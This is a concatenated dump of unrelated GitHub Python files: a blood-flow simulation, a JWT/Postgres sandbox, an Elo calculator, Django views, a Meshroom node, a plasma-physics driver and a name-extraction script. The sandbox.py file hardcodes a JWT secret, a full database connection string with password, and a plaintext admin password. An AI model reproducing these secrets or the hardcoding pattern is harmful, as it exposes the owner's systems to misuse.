F=F_mult*c1 * c2 * d * np.abs(pnow[n1] - pnow[n2]) / l\r\n dnew=d+d_update(F)\r\n reg_something_edges2.append((n1, n2, dnew, l))\r\n for n1, n2, d, l in in_edges:\r\n F=F_mult*c1 * c2 * d * np.abs(pnow[n1] - pnow[n2]) / l\r\n dnew=d+d_update(F)\r\n in_edges2.append((n1, n2, dnew, l))\r\n\r\n return reg_reg_edges2, reg_something_edges2, in_edges2\r\n\r\ndef create_pressure_flow_vector(G, n, qin=1, presout=0):\r\n global in_nodes, 
out_nodes\r\n presult = np.zeros(n * n)\r\n for node in in_nodes:\r\n presult[node] = -qin\r\n for node in out_nodes:\r\n presult[node] = presout\r\n return presult\r\n\r\ndef update_matrix():\r\n global in_nodes, out_nodes, reg_nodes, in_edges\r\n data, row, col = [], [], []\r\n\r\n diag = np.zeros(n * n)\r\n for n1, n2, d, l in reg_reg_edges:\r\n res = c1 * d ** 4 / l\r\n data.append(res)\r\n row.append(n1)\r\n col.append(n2)\r\n data.append(res)\r\n row.append(n2)\r\n col.append(n1)\r\n diag[n1] -= res\r\n diag[n2] -= res\r\n for n1, n2, d, l in reg_something_edges:\r\n res = c1 * d ** 4 / l\r\n data.append(res)\r\n row.append(n1)\r\n col.append(n2)\r\n diag[n1] -= res\r\n for node, datum in enumerate(diag):\r\n if datum != 0:\r\n row.append(node)\r\n col.append(node)\r\n data.append(datum)\r\n for node in out_nodes:\r\n row.append(node)\r\n col.append(node)\r\n data.append(1)\r\n\r\n insert = defaultdict(float)\r\n for n1, n2, d, l in in_edges:\r\n insert[n2] += c1 * d ** 4 / l\r\n sum_insert = sum(insert.values())\r\n\r\n for node in in_nodes:\r\n data.append(-sum_insert)\r\n row.append(node)\r\n col.append(node)\r\n\r\n for ins_node, ins in insert.items():\r\n data.append(ins)\r\n row.append(node)\r\n col.append(ins_node)\r\n\r\n return spr.csr_matrix((data, (row, col)), shape=(nkw, nkw))\r\n\r\ndef equidistant_geometry(R, xrange, yrange, how_many):\r\n id_center = De.find_center_node(G, n, xrange=xrange, yrange=yrange)\r\n\r\n def r_squared(node):\r\n # x0, y0 = G.nodes[n*n//2][\"pos\"]\r\n x0, y0 = G.nodes[id_center]['pos']\r\n x, y = G.nodes[node]['pos']\r\n r_sqr = (x - x0) ** 2 + (y - y0) ** 2\r\n return r_sqr\r\n\r\n boundary_nodes = []\r\n for (n1, n2) in G.edges():\r\n r1, r2 = r_squared(n1), r_squared(n2)\r\n if r1 > r2:\r\n n1, n2 = n2, n1\r\n r1, r2 = r2, r1\r\n\r\n n_b = n2\r\n\r\n if r2 >= R ** 2 and r1 <= R ** 2:\r\n # x, y = G.nodes[n_b]['pos'][0] - G.nodes[n**2 // 2]['pos'][0], G.nodes[n_b]['pos'][1] - G.nodes[n**2 // 2]['pos'][1]\r\n x, y = G.nodes[n_b]['pos'][0] - G.nodes[id_center]['pos'][0], G.nodes[n_b]['pos'][1] - \\\r\n G.nodes[id_center]['pos'][1]\r\n\r\n if x == 0: x = 0.000001\r\n if y == 0: y = 0.000001\r\n\r\n if (x >= 0 and y >= 0):\r\n fi = np.arctan(y / x)\r\n elif (x < 0 and y >= 0):\r\n fi = np.pi / 2 + np.arctan(-x / y)\r\n elif (x < 0 and y < 0):\r\n fi = np.pi + np.arctan(y / x)\r\n else:\r\n fi = (3 / 2) * np.pi + np.arctan(x / -y)\r\n boundary_nodes.append([n_b, fi])\r\n boundary_nodes.sort(key=lambda node: node[1])\r\n\r\n boundary_nodes, fis = zip(*boundary_nodes)\r\n\r\n num_of_out_nodes = how_many\r\n out_indexes = np.round(np.linspace(0, len(boundary_nodes) - 1, num_of_out_nodes + 1)).astype(int)\r\n out_nodes = list(np.array(boundary_nodes)[out_indexes[:-1]])\r\n in_nodes = [id_center]\r\n\r\n return in_nodes, out_nodes\r\n\r\n\r\n#================= GRAF I GEOMETRIA ==================================================================================\r\n\r\nG = De.Build_delaunay_net(n, diameter_wiggle_param=diameter_wiggle_param)\r\n#G = Tr.Build_triangular_net(n, length_wiggle_param=length_wiggle_param, diameter_wiggle_param=diameter_wiggle_param)\r\n\r\n#nx.write_edgelist(G,'test.edgelist',data=['d'])\r\n#example_graph = nx.read_edgelist('test.edgelist', nodetype=int, data=(('d', float),))\r\n# wczytaj zapisane srednice\r\n#for n1, n2 in G.edges():\r\n# G[n1][n2]['d'] = example_graph[n1][n2]['d']\r\n\r\n\r\n#in_nodes, out_nodes = equidistant_geometry(R = n//2.5, xrange = n, yrange = n, how_many = 100)\r\n\r\n#in_nodes, out_nodes, reg_nodes, 
in_edges = set_geometry(n, G, geo='cylindrical', R=n//2.5)\r\nin_nodes, out_nodes, reg_nodes, in_edges = set_geometry(n, G, geo='donut', R=n//2.5, R_s=n//20)\r\n#in_nodes, out_nodes, reg_nodes, in_edges = set_geometry(n, G, geo='rect')\r\n#in_nodes, out_nodes, reg_nodes, in_edges = set_geometry(n, G, geo='own', in_nodes=in_nodes, out_nodes=out_nodes)\r\n\r\n\r\nreg_reg_edges, reg_something_edges = [], []\r\nfor n1, n2 in G.edges():\r\n d = G[n1][n2]['d']\r\n l = G[n1][n2]['length']\r\n if (n1 not in in_nodes and n1 not in out_nodes) and (n2 not in in_nodes and n2 not in out_nodes):\r\n reg_reg_edges.append((n1, n2, d, l))\r\n elif (n1 not in in_nodes and n1 not in out_nodes):\r\n reg_something_edges.append((n1, n2, d, l))\r\n elif (n2 not in in_nodes and n2 not in out_nodes):\r\n reg_something_edges.append((n2, n1, d, l ))\r\n\r\n#================= PROGRAM WŁAŚCIWY ==================================================================================\r\n\r\npresult = create_pressure_flow_vector(G, n, qin, presout)\r\n#matrix = create_matrix(G, SPARSE=SPARSE)\r\n#if SPARSE: indices, indptr = matrix.indices, matrix.indptr\r\n\r\nfor i in range(iters):\r\n print(f'Iter {i + 1}/{iters}')\r\n t1 = time.time()\r\n matrix = update_matrix()\r\n t2 = time.time()\r\n pnow = solve_equation_for_pressure(matrix, presult)\r\n t3 = time.time()\r\n if i%((iters-1)//divide) == 0:\r\n Q_in = 0\r\n Q_out = 0\r\n for n1, n2, d, l in reg_reg_edges:\r\n G[n1][n2]['d']=d\r\n q=c1 * d ** 4 * np.abs(pnow[n1] - pnow[n2]) / l\r\n G[n1][n2]['q']=q\r\n\r\n for n1, n2, d, l in reg_something_edges: \r\n G[n1][n2]['d']=d\r\n q=c1 * d ** 4 * np.abs(pnow[n1] - pnow[n2]) / l\r\n G[n1][n2]['q']=q\r\n \r\n if n2 in in_nodes:\r\n Q_in+=q\r\n if n2 in out_nodes:\r\n Q_out+=q\r\n \r\n print('Q_in =', Q_in, 'Q_out =', Q_out)\r\n \r\n Dr.drawq(G, n, f'c{i//((iters-1)//divide):04d}.png', in_nodes=in_nodes, out_nodes=out_nodes)\r\n t4 = time.time()\r\n reg_reg_edges, reg_something_edges, in_edges=update_graph(pnow, reg_reg_edges, reg_something_edges, in_edges)\r\n t5 = time.time()\r\n\r\n print('Update matrix\\t', t2-t1)\r\n print('Solve equation\\t', t3-t2)\r\n print('Update graph\\t', t5-t4)\r\n\r\n#for n1, n2 in G.edges():\r\n# print(n1, n2, G[n1][n2]['q'])","repo_name":"karol-lukanowski/symulacja-krwi","sub_path":"inne/old_main.py","file_name":"old_main.py","file_ext":"py","file_size_in_byte":10414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71620630132","text":"# Fonction pour générer un jeton JWT valide pour l'utilisateur donné\nimport psycopg2 as psy\nimport jwt\nfrom datetime import datetime, timedelta\nimport security\n\n# Clé secrète pour signer les jetons JWT\nSECRET_KEY = \"jesuisunefougere974\"\n\n# Durée de validité du jeton (nous utilisons timedelta pour que nous puissions facilement ajouter ou soustraire du temps)\nTOKEN_EXPIRATION_TIME = timedelta(days=7)\n\n\ndef set_connection():\n connection = psy.connect('postgres://testneon33:dfkFh5jcr1Tw@ep-hidden-forest-997741.eu-central-1.aws.neon.tech/neondb')\n connection.set_session(autocommit=True)\n cursor = connection.cursor()\n return connection, cursor\n\n\ndef generate_token(username: str) -> str:\n # Définir la date d'expiration du jeton\n expiration = datetime.utcnow() + TOKEN_EXPIRATION_TIME\n\n # Créer la charge utile pour le jeton JWT (nous incluons le nom d'utilisateur et la date d'expiration)\n payload = {\"sub\": username, \"exp\": expiration}\n\n # Créer le jeton JWT en signant la charge utile 
avec la clé secrète\n token = jwt.encode(payload, SECRET_KEY, algorithm=\"HS256\")\n\n # Retourner le jeton en tant que chaîne de caractères\n return token\n\n\n\ndef insert_admin_user(username, pwd, role):\n connection, cursor = set_connection()\n token = generate_token(\"mulder974\")\n pwd = security.hash_pwd(pwd)\n user = (username, pwd, role, token, datetime.now())\n print(user)\n print(\"trying to insert\")\n cursor.execute(\n \"\"\"\n INSERT INTO Users (username, pwd, user_role, user_token, create_at)\n VALUES (%s, %s, %s, %s, %s)\n \"\"\",\n user\n )\n print(\"inserted\")\n\n connection.close()\n\n\n\ndef select_all_users():\n connection, cursor = set_connection()\n\n cursor.execute(\"\"\"SELECT * FROM Users\"\"\", )\n\n result = cursor.fetchall()\n connection.close()\n\n return result\n\ninsert_admin_user(\"mulder974\",\"tiTeuf145*\",\"1\")\n\nprint(select_all_users())","repo_name":"hugofgry/utils","sub_path":"sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10803422288","text":"import pandas as pd\nimport numpy as np\nimport japanize_matplotlib\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\ndef win_rate(Ra,Rb):\n return 1/(10**((Rb-Ra)/400)+1)\n\nclass elo_calc:\n def __init__(self,player: pd.DataFrame, result: pd.DataFrame):\n self.C=32.0\n self.speed=2\n self.player = player\n self.player = self.player.set_index('name')\n self.result = result\n #self.result_sheet\n self.player['elo']=1500.0\n self.history = self.player['elo']\n self.N = len(self.result.index)\n\n def debug(self):\n print(self.player)\n print(self.result)\n print(win_rate(1700,1500))\n\n def fit(self):\n for i in range(self.result.shape[0]):\n winner=self.result.at[i,'win']\n loser=self.result.at[i,'lose']\n delta_rate=self.C*win_rate(self.player.at[loser,'elo'],self.player.at[winner,'elo'])\n #print(delta_rate)\n self.player.at[winner,'elo']+=delta_rate\n self.player.at[loser,'elo']-=delta_rate\n #self.history = pd.concat([self.history,self.player['elo']],axis=1)\n if self.speed*i/self.N > 1/self.C:\n self.const_step()\n #print(self.player)\n #print(self.history)\n\n def fit2(self):\n player_list=self.player.index.tolist()\n #print(player_list)\n result_sheet=pd.DataFrame(index=player_list,columns=player_list)\n result_sheet.fillna(1, inplace=True)\n for i in range(len(self.result)):\n result_sheet[self.result['win'][i]][self.result['lose'][i]]+=1\n p=pd.Series([1.0]*len(player_list),index=player_list)\n p_n=pd.Series([1.0]*len(player_list),index=player_list)\n for _ in range(30):\n for i in range(len(p)):\n division=0.0\n for j in range(len(p)):\n if i != j:\n #print('i={},j={}'.format(i,j))\n #print(result_sheet[player_list[i]][player_list[j]])\n division += (result_sheet[player_list[i]][player_list[j]]+result_sheet[player_list[j]][player_list[i]])/(p[player_list[i]]+p[player_list[j]])\n p_n[i]=result_sheet[player_list[i]].sum()/division\n p_n = p_n/p_n.sum()\n p=p_n\n elo_raw=400*np.log10(p_n)\n self.player['elo']=1500+elo_raw-elo_raw.mean()\n def const_step(self):\n self.C/=2\n #print(self.C)\n def save_rating(self,save_dir):\n self.player.to_csv(save_dir)\n def save_move(self,save_dir):\n self.history.T.reset_index(drop=True).plot()\n 
plt.savefig(save_dir)\n","repo_name":"kento-libra/tera_elo_rating","sub_path":"elo_calc.py","file_name":"elo_calc.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6309976437","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n\nimport sys\nfrom GT3.IOL import IOL\nfrom GT3.SOL import Sol\nfrom GT3.ReadInFIle import ReadInfile\nfrom GT3.ImpRadiation import ImpRad\nfrom GT3.Core import Core\nfrom GT3.BeamDeposition import BeamDeposition\nfrom GT3.DensityLimit import DensityLimit\nfrom GT3.Marfe import Marfe\nfrom GT3.RadialTransport import RadialTransport\n\ntry:\n from GT3.Neutrals import Neutrals\nexcept ImportError:\n pass\nexcept ModuleNotFoundError:\n pass\n\nclass gt3:\n\n def __init__(self, inputFile=None, preparedInput = None, mode=\"coreonly\", **kwargs):\n sys.dont_write_bytecode = True\n # Create shotlabel as an attribute of plasma class\n if \"iolFlag\" in kwargs:\n iolFlag = kwargs['iolFlag']\n else:\n iolFlag = True\n if \"neutFlag\" in kwargs:\n neutFlag = kwargs['neutFlag']\n else:\n neutFlag = True\n if \"verbose\" in kwargs:\n verbose = kwargs['verbose']\n else:\n verbose = False\n if inputFile:\n self.inputFile = inputFile\n if preparedInput:\n self.inp = preparedInput\n else:\n self.inp = ReadInfile(self.inputFile)\n self.core = Core(self.inp)\n self.iolFlag = iolFlag\n self.neutFlag = neutFlag\n self.verbose = verbose\n self.beamPowerFracOverride = None\n self.ntrl_cpu_override = False\n\n try:\n import neutpy\n self.neutpyLoaded = True\n except ModuleNotFoundError:\n self.neutpyLoaded = False\n except ImportError:\n self.neutpyLoaded = False\n\n if mode == 'coreonly':\n pass\n\n\n if mode == 'coreandsol':\n self.sol = Sol(self.inp, self.core)\n elif mode == 'thermaliol':\n self.iol = IOL(self.inp, self.core)\n elif mode == 'fulliol':\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n elif mode == 'imp':\n self.imp = ImpRad(core=self.core)\n elif mode == 'ntrls':\n self._run_neutpy()\n elif mode == 'ntrlsandiol':\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n self._run_neutpy()\n elif mode == 'nbi':\n if self.iolFlag:\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n elif mode == 'marfe_denlim':\n if self.iolFlag:\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n self._run_neutpy()\n self.imp = ImpRad(core=self.core)\n self.dl = DensityLimit(self.core, self.nbi)\n self.mar = Marfe(core=self.core)\n elif mode == 'marfe':\n if self.iolFlag:\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n self._run_neutpy()\n self.imp = ImpRad(core=self.core)\n self.mar = Marfe(core=self.core)\n elif mode == 'allthethings':\n if self.iolFlag:\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, 
self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n self._run_neutpy()\n self.imp = ImpRad(core=self.core)\n self.dl = DensityLimit(self.core, self.nbi)\n self.mar = Marfe(self.inp, self.core, self.imp)\n elif mode == 'radialtrans':\n if self.iolFlag:\n self.iol = IOL(self.inp, self.core)\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n self.sol = Sol(self.inp, self.core)\n self._run_neutpy()\n self.imp = ImpRad(z=None, core=self.core)\n self.rtrans = RadialTransport(self.core, self.iol, self.nbi, self.iolFlag, self.neutFlag)\n\n def _run_neutpy(self, reRun=False):\n if self.neutpyLoaded:\n self.ntrl = Neutrals(self.inp, self.core, cpus=self.ntrl_cpu_override)\n if reRun:\n self.ntrl.reRun(cpus=self.ntrl_cpu_override)\n else:\n print(\"NeutPy is not loaded. Cannot run Neutrals calculation\")\n\n\n def override_NBI_Pwrfrac(self, frac):\n if isinstance(frac, list):\n self.beamPowerFracOverride = frac\n else:\n print(\"Please provide the NBI power fraction override as a list\")\n\n def run_SOL(self):\n self.sol = Sol(self.inp, self.core)\n return self\n\n def run_IOL(self):\n self.iol = IOL(self.inp, self.core)\n return self\n\n def run_NBI(self, reRun=False):\n try:\n self.iol\n except AttributeError:\n print (\"IOL module not run. Running now...\")\n self.run_IOL()\n if self.iolFlag:\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, reRun=reRun,\n pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n return self\n\n def run_impurities(self):\n self.imp = ImpRad(core=self.core)\n return self\n\n def run_neutrals(self, reRun=False):\n self._run_neutpy(reRun=reRun)\n return self\n\n def override_ntrl_cpus(self, num):\n self.ntrl_cpu_override = num\n return self\n\n def run_density_limit(self):\n if self.iolFlag:\n self.nbi = BeamDeposition(self.inp, self.core, self.iol, pwrFracOverride=self.beamPowerFracOverride)\n else:\n self.nbi = BeamDeposition(self.inp, self.core, pwrFracOverride=self.beamPowerFracOverride)\n self.dl = DensityLimit(self.core, self.nbi)\n return self\n\n def run_marf(self):\n self.mar = Marfe(self.inp, self.core)\n return self\n\n def run_radial_transport(self, nbiReRun=False, ntrlReRun=False):\n try:\n self.iol\n except AttributeError:\n print (\"IOL module not run. Running now...\")\n self.run_IOL()\n try:\n self.nbi\n except AttributeError:\n print (\"NBI module not run. Running now...\")\n self.run_NBI(reRun=nbiReRun)\n\n try:\n self.imp\n except AttributeError:\n print (\"Impurity radiation module not run. Running now...\")\n self.imp = ImpRad(z=6, core=self.core)\n\n try:\n self.ntrl\n except AttributeError:\n print (\"Neutrals module not run. 
Running now...\")\n self.run_neutrals(reRun=ntrlReRun)\n\n\n self.rtrans = RadialTransport(self.core, self.iol, self.nbi, self.iolFlag, self.neutFlag)\n return self\n\n def disable_IOL(self):\n self.iolFlag = False\n print (\"Re-running Radial Transport without IOL\")\n try:\n self.rtrans\n except:\n self.run_radial_transport()\n return self\n\n def disable_neutrals(self):\n self.neutFlag = False\n print (\"Running Radial Transport without neutral particles\")\n try:\n self.rtrans\n except:\n self.run_radial_transport()\n return self","repo_name":"gt-frc/gt3","sub_path":"GT3/gt3.py","file_name":"gt3.py","file_ext":"py","file_size_in_byte":8244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42605524958","text":"import logging\n\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import IntegrityError\nfrom django.shortcuts import redirect, render\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import View\nfrom service_objects.errors import InvalidInputsError\n\nfrom .forms import AddShiftForm, AddTaskForm\nfrom .models import Manager, Member, Priority, Shift, Status\nfrom .services import AddShift, AddTask, GetShift, GetShifts\n\nlogger = logging.getLogger(__name__)\n\n\n@login_required\ndef index(request):\n \"\"\"\n Show list of shifts\n \"\"\"\n shifts = GetShifts.execute({}, user=request.user)\n return render(\n request,\n \"shifts/index.html\",\n {\n \"page_title\": \"Shifts\",\n \"past_shifts\": shifts.get(\"past_shifts\"),\n \"upcoming_shifts\": shifts.get(\"upcoming_shifts\"),\n \"ongoing_shift\": shifts.get(\"ongoing_shift\"),\n \"managers\": Manager.objects.select_related(\"user\").all(),\n \"members\": Member.objects.select_related(\"user\").all(),\n },\n )\n\n\n@login_required\ndef create(request):\n \"\"\"\n Create new shift\n \"\"\"\n form = AddShiftForm(request.POST)\n try:\n if form.is_valid():\n shift = AddShift.execute(request.POST)\n\n messages.success(request, \"Shift added successfully\")\n logger.info(f\"Shift added successfully. id: {shift.id}\")\n else:\n messages.error(request, \"Issue with items entered. 
Check and try again.\")\n except IntegrityError:\n messages.error(request, \"Date already exists\")\n logger.error(\"Date already exists\", exc_info=True)\n finally:\n return redirect(\"shifts:index\")\n\n\n@login_required\ndef detail(request, uuid):\n \"\"\"\n Display details of shift\n \"\"\"\n\n try:\n\n shift = GetShift.execute({\"uuid\": uuid}, user=request.user)\n\n if not shift:\n messages.error(\n request,\n \"Could not find shift for id provided\",\n extra_tags=\"alert-important\",\n )\n return redirect(\"shifts:index\")\n\n except InvalidInputsError as e:\n\n messages.error(\n request,\n f\"Invalid shift id: {e.errors.get('uuid').as_text()}\",\n extra_tags=\"alert-important\",\n )\n return redirect(\"shifts:index\")\n\n return render(\n request,\n \"shifts/detail.html\",\n {\n \"page_title\": \"Shift Details\",\n \"shift\": shift[\"shift\"],\n \"shift_tasks\": shift[\"shift_tasks\"],\n \"member_tasks\": shift[\"member_tasks\"],\n \"groups_data\": shift[\"groups_data\"],\n \"timeline_data\": shift[\"timeline_data\"],\n \"priorities\": Priority.objects.all(),\n \"statuses\": Status.objects.all(),\n },\n )\n\n\n@method_decorator(login_required, name=\"dispatch\")\nclass TaskView(View):\n def post(self, request):\n suuid = request.POST.get(\"uuid\")\n form = AddTaskForm(request.POST, suuid=suuid)\n shift = Shift.objects.get(uuid=suuid)\n\n if form.is_valid():\n task = AddTask.execute(request.POST, suuid=request.POST.get(\"uuid\"))\n\n messages.success(request, \"Task added successfully\")\n logger.info(f\"Task added successfully. id: {task.id}\")\n else:\n messages.error(\n request,\n f\"Issue with items entered. Check and try again.\",\n extra_tags=\"alert-important\",\n )\n\n return redirect(shift)\n","repo_name":"taiyeoguns/shiftmgr-django","sub_path":"shifts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18408181413","text":"__version__ = \"1.1\"\n\nfrom meshroom.core import desc\n\nimport os.path\n\n\nclass PanoramaPrepareImages(desc.AVCommandLineNode):\n commandLine = 'aliceVision_panoramaPrepareImages {allParams}'\n size = desc.DynamicNodeSize('input')\n\n category = 'Panorama HDR'\n documentation = '''\nPrepare images for Panorama pipeline: ensures that images orientations are coherent.\n'''\n\n inputs = [\n desc.File(\n name=\"input\",\n label=\"Input\",\n description=\"SfMData file.\",\n value=\"\",\n uid=[0],\n ),\n desc.ChoiceParam(\n name=\"verboseLevel\",\n label=\"Verbose Level\",\n description=\"Verbosity level (fatal, error, warning, info, debug, trace).\",\n value=\"info\",\n values=[\"fatal\", \"error\", \"warning\", \"info\", \"debug\", \"trace\"],\n exclusive=True,\n uid=[],\n ),\n ]\n\n outputs = [\n desc.File(\n name=\"output\",\n label=\"SfMData\",\n description=\"Output SfMData file.\",\n value=lambda attr: desc.Node.internalFolder + os.path.basename(attr.node.input.value),\n uid=[],\n ),\n ]\n","repo_name":"alicevision/Meshroom","sub_path":"meshroom/nodes/aliceVision/PanoramaPrepareImages.py","file_name":"PanoramaPrepareImages.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":10013,"dataset":"github-code","pt":"21"} +{"seq_id":"42795974355","text":"from math import sqrt \n\ndef eh_primo(x):\n x = int(x)\n if x == 2:\n return True\n elif x < 2:\n return False\n t = 2\n while t < x:\n if x % t == 0:\n return False\n elif x % t != 0:\n t += 1\n return True\n \ndef 
primos_entre(a, b):\n lista = []\n x = int(a)\n y = int(b) \n while x <= y:\n if eh_primo(x) == True:\n lista.append(x)\n x += 1\n return lista","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_175/ch55_2019_04_06_01_07_32_996832.py","file_name":"ch55_2019_04_06_01_07_32_996832.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22795366969","text":"from natasha import NamesExtractor\nimport nltk\nimport os\nimport string\n# nltk.download('stopwords')\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom collections import Counter\nfrom pprint import pprint\nimport pymorphy2\nimport json\n\n\nwith open(\"fileJson2.json\", \"r\") as read_file:\n names = json.load(read_file)\nextractor = NamesExtractor()\n\n\ndef appendSpans(span, delta, spans):\n start = span[0] - delta\n end = span[1] + delta\n # spans[was_names[-1]] = {\"Start\": [], \"End\": []} # убрать\n if (was_names[-1] not in spans):\n spans[was_names[-1]] = {\"Start\": [], \"End\": []}\n k = len(spans[was_names[-1]][\"Start\"])\n includes = False\n insertPos = -1\n key = was_names\n for i in range(k):\n if start <= spans[was_names[-1]][\"Start\"][i]:\n # if (end <= spans[was_names[-1]][\"Start\"][i]):\n # spans[was_names[-1]][\"Start\"].insert(i, start)\n # spans[was_names[-1]][\"End\"].insert(i, end)\n # break\n if (spans[was_names[-1]][\"Start\"][i] <= end <= spans[was_names[-1]][\"End\"][i]):\n spans[was_names[-1]][\"Start\"][i] = start\n includes = True\n break\n elif (end >= spans[was_names[-1]][\"End\"][i]):\n spans[was_names[-1]][\"Start\"][i] = start\n spans[was_names[-1]][\"End\"][i] = end\n includes = True\n break\n elif (spans[was_names[-1]][\"Start\"][i] <= start <= spans[was_names[-1]][\"End\"][i]):\n if (spans[was_names[-1]][\"Start\"][i] <= end <= spans[was_names[-1]][\"End\"][i]):\n includes = True\n elif (end >= spans[was_names[-1]][\"End\"][i]):\n spans[was_names[-1]][\"End\"][i] = end\n includes = True\n break\n if (insertPos == -1 and spans[was_names[-1]][\"Start\"][i] <= start):\n insertPos = i\n if (includes==False):\n if (insertPos != -1):\n spans[was_names[-1]][\"Start\"].insert(insertPos, start)\n spans[was_names[-1]][\"End\"].insert(insertPos, end)\n else:\n spans[was_names[-1]][\"Start\"].append(start)\n spans[was_names[-1]][\"End\"].append(end)\n\n\ndef findX(name, start):\n name = name.replace(\"ё\", \"е\")\n lessImportant = []\n moreImportant = []\n\n for i in names:\n if (i in name and not any([j in name for j in names[i][-1]])):\n if (name.startswith(i)):\n if (len(names[i]) != 2):\n print(len(names[i]))\n print(text[max(start - 100, 0):min(len(text) - 1, start + 100)])\n print(names[i])\n inp = input()\n if (inp != \"\"):\n moreImportant.append(inp)\n else:\n moreImportant.append(names[i][0])\n\n else:\n if (len(names[i]) != 2):\n print(text[max(start - 100, 0):min(len(text) - 1, start + 100)])\n print(names[i])\n inp = input()\n if (inp != \"\"):\n lessImportant.append(inp)\n else:\n lessImportant.append(names[i][0])\n # print(names[i], end=\" \")\n\n if (len(moreImportant) != 0):\n # print(*moreImportant)\n was_names.append(moreImportant[0])\n return True\n elif (len(lessImportant) != 0):\n # print(*lessImportant)\n was_names.append(lessImportant[0])\n return True\n return False\n # print()\n\nmorph = pymorphy2.MorphAnalyzer()\n\n\n\npath = 'bil1/'\nfnames = os.listdir(path)\narr = {}\nwas_names = []\nSmallSpans = 
{}\nLargeSpans = {}\nborders = 200\n\n\nnothing1 = set()\nnothing2 = set()\nnothing3 = set()\n\n\nextractor = NamesExtractor()\n# Потом поменяю выбор файлов. Так пока удобнее\nfor name in range(1, 41):\n spans = {}\n # по очереди открываем файлы и извлекаем имена\n with open(path + str(name), 'r', encoding='utf-8') as f:\n text = f.read().strip()\n matches = extractor(text)\n\n for match in matches:\n first = \"\"\n second = \"\"\n last = \"\"\n if (match.fact.first) != None:\n first = match.fact.first + \" \"\n if (match.fact.middle) != None:\n second = match.fact.middle + \" \"\n if (match.fact.last) != None:\n last = match.fact.last\n\n if (findX(first + second + last, match.span[0])):\n # print(was_names[-1] == \"Илья Муромец\")\n appendSpans(match.span, 200, LargeSpans)\n appendSpans(match.span, 50, SmallSpans)\n\n # spans[was_names[-1]].append(match.span)\n\n # ------------------------------------------------------------------------------------------------------------------\n for i in range(len(was_names)):\n # Запись имен в словарь. Каждому персонажу присваивается множество персонажей, с которыми он встретился в одном тексте\n if not(was_names[i] in arr):\n arr[was_names[i]] = {\"names\": {}, \"characteristic\": [], \"smallCharacteristic\":[], \"count\": 0, \"text_number\":[]}\n\n arr[was_names[i]][\"count\"] += 1\n if (name not in arr[was_names[i]][\"text_number\"]):\n arr[was_names[i]][\"text_number\"].append(name)\n for j in range(len(was_names)):\n if (was_names[j] == was_names[i]):\n continue\n if (was_names[j] not in arr[was_names[i]][\"names\"]):\n arr[was_names[i]][\"names\"][was_names[j]] = [0, []]\n arr[was_names[i]][\"names\"][was_names[j]][0] += 1\n if name not in arr[was_names[i]][\"names\"][was_names[j]][1]:\n arr[was_names[i]][\"names\"][was_names[j]][1].append(name)\n #\n text = text.lower()\n for name in set(was_names):\n for i in range(len(LargeSpans[name][\"Start\"])):\n largeBorderLeft = max(0, LargeSpans[name][\"Start\"][i])\n smallBorderLeft = max(0, SmallSpans[name][\"Start\"][i])\n # while text[borderLeft] != ' ' and borderLeft < len(text) - 2:\n # borderLeft += 1\n largeBorderRight = min(LargeSpans[name][\"End\"][i], len(text) - 1)\n smallBorderRight = min(SmallSpans[name][\"End\"][i], len(text) - 1)\n\n # while text[borderRight] != ' ' and borderRight > 0:\n # borderRight -= 1\n arr[name][\"characteristic\"].append(text[largeBorderLeft + 1:largeBorderRight])\n arr[name][\"smallCharacteristic\"].append(text[smallBorderLeft:smallBorderRight])\n\n # Выбор поддтекста. 
